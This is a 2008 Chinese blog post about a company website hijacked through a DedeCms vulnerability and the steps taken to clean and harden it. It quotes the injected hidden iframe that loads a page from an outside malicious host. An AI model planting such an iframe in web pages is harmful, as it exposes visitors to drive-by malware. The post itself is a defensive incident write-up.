首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

网络攻击--利用DedeCms漏洞

Posted on 2008-10-16 10:15  停留的风  阅读(5187)  评论(13编辑  收藏  举报

打开公司网站首页,360和杀毒软件就对一个网页进行了劫持,怎么网页受到了病毒侵害呢。通过浏览器查看网页的源代码,发现了一段陌生的代码

<iframe src=http://www.wyf006.cn/one/a9.htm width=50 height=0 border=0></iframe>

 

一看到这段代码,就想起了之前曾经遭遇的Iframe攻击,一种ARP病毒,当时就是由于内网的一台机器感染了ARP病毒,然后不断的进行发包,造成了每台机器在打开网页的时候,都会出现错误,最根本的特征就是在网页中插入这样一条类似的iframe代码,将一个广告网页嵌入进来。当时的解决方案:

      <1>开启ARP保护

      <2>清理一切临时文件,包括IE和系统的,特别是IE,很多缓存的页面可能已经感染了病毒。

      <3>修复系统漏洞,可以用360的系统修复功能

      <4>进行一次全面的杀毒处理,最好寻得专杀工具进行一次全面杀毒

然后我就按着头脑中已定的逻辑去逐步操作,本以为这样就可以解决问题了,但是再处理之后,将那段攻击代码 删除之后,过了没多久又重新被挂马。我也寻得多种木马专杀等工具进行查杀,但是并没有找到问题的根源。

然后我只得到网络上寻得救援。

在不经意间,我发现了,可能与DedeCms有关。一想我的程序应该没有多大问题,而且偏偏攻击的是我的主页,静态页面,而公司网站也有设计部使用DedeCms系统进行管理和维护。

在这个启蒙下,感觉寻得一丝曙光。然后我就让设计部着手去寻得问题的根源

       <1>进入DedeCms管理系统,查看文件,找寻可疑文件。

      果然,在仔细搜寻一番之后,发现很多陌生文件的,有的文件以2008为名,有的以简单aa,bb为名,这些可疑文件的命名很不规范,有的是JS文件,有的是PHP,有的是HTML,看来这就是毒源了。查看里面的代码,发现一般都是乱码。    将这些可疑文件全部删除。  

      <2>看来问题真的出在这里,然后,升级DedeCms,修复系统漏洞

      <3>关闭一些不用的功能,会员功能等。

      <4>将权限进行重新划分,对于一些具有写入权限的目录一定要严格限制。